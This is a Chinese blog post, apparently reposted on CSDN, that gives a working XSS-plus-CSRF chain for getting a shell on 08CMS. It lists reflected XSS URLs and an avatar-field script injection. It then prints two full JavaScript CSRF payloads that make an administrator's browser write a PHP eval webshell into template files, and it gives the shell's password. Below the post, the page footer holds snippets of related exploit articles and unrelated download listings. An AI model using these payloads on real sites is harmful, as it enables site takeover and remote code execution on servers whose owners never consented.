php 删除%3ca%3e标签,08cms会员中心xss+csrf可getshell

最新推荐文章于 2022-08-01 14:33:24 发布
最新推荐文章于 2022-08-01 14:33:24 发布
阅读量587 收藏 1
点赞数
文章标签: php 删除%3ca%3e标签
该博客揭露了一个站点的反射型XSS漏洞,涉及PHP代码执行,包括利用adminm.php和admina.php进行文件操作。作者详细介绍了两种不同版本的getshell方法,并展示了针对3.0前后版本的攻击脚本。
摘要由CSDN通过智能技术生成

这个属于本站原创,很难看到的哦

首先是在搜索出存在反射性的跨站

搜索处存在反射性xss

[php]

http://0day5.com/search.php?caid=2&ccid1=208&chid=4&djfrom=1&djto=1

http://0day5.com/search.php?caid=2&ccid1=208&chid=4&djfrom=1&djto=1

http://0day5.com/search.php?caid=4&chid=2&mchid=1&zjfrom=1&zjto=1

http://0day5.com/search.php?caid=4&chid=2&mchid=1&zjfrom=1&zjto=1

[/php]

会员中心adminm.php?action=memberinfo

修改头像的时候发现可以外部调用,仅仅是检查了后缀,然后在附件的地方插入

[php]

http://0day5.com/">

adminc/images/logo_member.png[/php]

返回我的首页,发现成功的触发了xss

然后在后台测试,发现了两种不同的getshell的办法

针对3.0以前的附上js脚本,3.0以后的没条件测试。通过演示站目测的。不行就算了

[php]

function ajax(){

var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest();

} else if(window.ActiveXObject) {

var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

for(var i=0; i

try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

}

return request;

}

var _x = ajax();

postgo();

function postgo() {

src="/admina.php?entry=csstpls&action=filedetail&filename=0day5.php&jsmode=1&forward=";

data="contentnew=%3C%3Fphp+eval%28%24_POST%5B0day5%5D%29%3B+%3F%3E&bfiledetail=%CC%E1%BD%BB";

xhr_act("POST",src,data);

}

function xhr_act(_m,_s,_a){

_x.open(_m,_s,false);

if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

_x.send(_a);

return _x.responseText;

}[/php]

针对3.0以后的在其他的地方

[php]

function ajax(){

var request = false;

if(window.XMLHttpRequest) {

request = new XMLHttpRequest();

} else if(window.ActiveXObject) {

var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

for(var i=0; i

try {

request = new ActiveXObject(versions[i]);

} catch(e) {}

}

}

return request;

}

var _x = ajax();

postgo();

function postgo() {

src="/admina.php?entry=sptpls&action=sptpldetail&spid=search";

data="contentnew=%3C%3Fphp+eval%28%24_POST%5B0day5%5D%29%3B+%3F%3E&bfiledetail=%CC%E1%BD%BB";

xhr_act("POST",src,data);

}

function xhr_act(_m,_s,_a){

_x.open(_m,_s,false);

if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

_x.send(_a);

return _x.responseText;

}[/php]

成功后连接search.php 密码是0day5

特大号豆腐
关注
08cms后台SHELL教程
09-29
拿后天,代码,教程拿后天,代码,教程拿后天,代码,教程
08cms cecore.cls.php,08CMS 变量覆盖导致getshell 等问题
weixin_42349769的博客
03-29 119
我也是初学php 文章有什么不对的 还望各位指出错误 见谅 。。。=================================================================/Include/general.inc.php 21-26行[php](isset($_REQUEST['GLOBALS']) || isset($_FILES['GLOBALS'])) &&a...
php 去掉%3c p%3e,cmseasy csrf通过一个xss最后getshell
weixin_39609423的博客
03-28 2419
为什么我们要选择get类型的呢,因为get类型存储到数据库的时候触发时候管理员是察觉不到的,可以通过图片等进行操作,然后我们存储一个xss后门,这样一来,我们就可以加载一个远端的js,那么就各种无视token和referer了开始我们先分析一段源代码:celive/admin/system.php:(line:128-142):if($do == 'add' and $username != ''...
php %3c%3c%3cxml 报错,代码审计| APPCMS SQL-XSS-CSRF-SHELL
weixin_39657249的博客
03-19 175
0x01 背景由若水师傅提供的一个素材,想要复现CNVD上披露的一个APPCMS的漏洞,由CNVD上的描述可以知道存在漏洞的地方是comment.php这个文件,然后就没有详细的漏洞信息了,所以就需要分析相应的源码文件找出存在漏洞的点。借这个素材捡起下代码审计的各种感觉。期待一起学习,期待和师傅们各种交流讨论。官方站点:http://www.appcms.cc/漏洞详情地址:http://www....
mysql中的%3cif%3e_PhpcmsV9从反射型XSSCSRF绕过到Getshell
weixin_42358594的博客
02-02 659
0x01 测试场景:版本信息截图如下:0x02 测试思路:检测者通过投稿的方式或者其他可能的方式递送存在漏洞的链接,一旦后台用户点击,就会自动添加一个新的管理员(该项需要管理权权限,后台其他重要操作等)或者在一定条件下直接Getshell。接下来分说几个漏洞点,最后进行漏洞复现。0x03 文件报错这种类型的洞在phpcms中还挺常见的,主要是没有处理好一些包含,单独挖这种洞实际上意义也不大,但是如...
%3ca%3e在html中的作用,实用的接口安全测试用例
weixin_34521244的博客
06-20 692
网上收集来的(所有的都是半角的单引和又引)分几种类型:输入验证,sql注入,xss攻击,ubb,用户名密码1、输入验证客户端验证 服务器端验证(禁用脚本调试,禁用Cookies)1.输入很大的数(如72932398579857),输入很小的数(负数)2.输入超长字符,如对输入文字长度有限制,则尝试超过限制,刚好到达限制字数时有何反应3.输入特殊字符,如:~!@#$%^&*()_+<&...
mysql+%3c%3e+cdata,cmseasy getshell 0day | CN-SEC 中文网
weixin_30540871的博客
03-23 140
摘要by zvall代码如下:celive/index.php 代码:[php]$_SESSION[‘thislive’] = md5(time());$_SESSION[‘thislivetmp’] = $_SESSION[‘thislive’];by zvall代码如下:celive/index.php 代码:[php]$_SESSION['thislive'] = md5(time());$...
php中提取%3cdiv,cmseasy getshell 0day
weixin_34374684的博客
03-18 2322
by zvall代码如下:celive/index.php 代码:[php]$_SESSION['thislive'] = md5(time());$_SESSION['thislivetmp'] = $_SESSION['thislive'];if ($config['customer_info']) {header('Location: '.$config['url'].'/live/?act...
dedecms利用xss+csrf getshell
weixin_30872867的博客
06-06 370
dedecms的漏洞很多,但是厂商都是不做修复。 之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修复,只是在title上加了addslashes。 后台可触发xss 利用js代码 01 varrequest =false...
渗透测试 2 --- XSSCSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3279
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
PHP WebSehll 后门脚本与检测工具
悦分享
08-01 1490
PHP是一种动态弱类型语言,参数传递、类型转换、函数调用方式都非常灵活,这给开发者带来开发便利的同时,也给攻击者编写各种畸形恶意代码带来了很多便利,通过翻阅PHP手册
PHP常见的十个安全问题
weixin_49163826的博客
07-20 992
相对于其他几种语言来说, PHP 在 web 建站方面有更大的优势,即使是新手,也能很容易搭建一个网站出来。但这种优势也容易带来一些负面影响,因为很多的 PHP 教程没有涉及到安全方面的知识。 此帖子分为几部分,每部分会涵盖不同的安全威胁和应对策略。但是,这并不是说你做到这几点以后,就一定能避免你的网站出现任何问题。如果你想提高你的网站安全性的话,你应该继续通过阅读书籍或者文章,来研究如何提高你的网站安全性 出于演示需要,代码可能不是很完美。日常开发过程中,很多代码都包含在了框架跟各种库里面。作为一个后台开
渗透测试面试题
热门推荐
千寻的博客
12-31 11万+
渗透测试面试题 一.思路流程 1.信息收集 服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) 网站指纹识别(包括,cms,cdn,证书等),dns记录 whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等) 子域名收集,旁站,C段等 google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等 扫描网站目录结构,爆后台,网站banner,测试文件,...
CPPC++_低成本实现Wooting键盘的Rapid trigger功能不必为几个按键购买整个键盘人人都能做Wouo.zip
11-12
CPPC++_低成本实现Wooting键盘的Rapid trigger功能不必为几个按键购买整个键盘人人都能做Wouo
CPPC++_可能是世界上最快的协同程序库.zip
11-12
CPPC++_可能是世界上最快的协同程序库
ConsulHelper,.Net微服务基础框架,已支持.NetCore,具备服务发现、健康检查、服务分级、分布式配置.zip
最新发布
11-12
ConsulHelper,.Net微服务基础框架,已支持.NetCore,具备服务发现、健康检查、服务分级、分布式配置、版本控制
各种三维模型(gltf,glb格式)
11-12
有卫星、警车、消防车、Cesium飞机、Cesium无人机等等。具体图片如下文章:https://blog.csdn.net/weixin_44857463/article/details/143721670?sharetype=blogdetail&sharerId=143721670&sharerefer=PC&sharesource=weixin_44857463&spm=1011.2480.3001.8118
yii2.0+admin后台以及rbac权限.zip
11-12
yii2.0+admin后台以及rbac权限
x=%3Cscript%3E
05-30
这个请求中,x的值是"%3Cscript%3E",它是对字符串"<script>"进行URL编码后的结果。在URL中,某些字符需要进行编码,才能在网络上正确传输和展示。"和">"等字符在URL中有特殊含义,如果直接使用这些字符,可能会导致...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值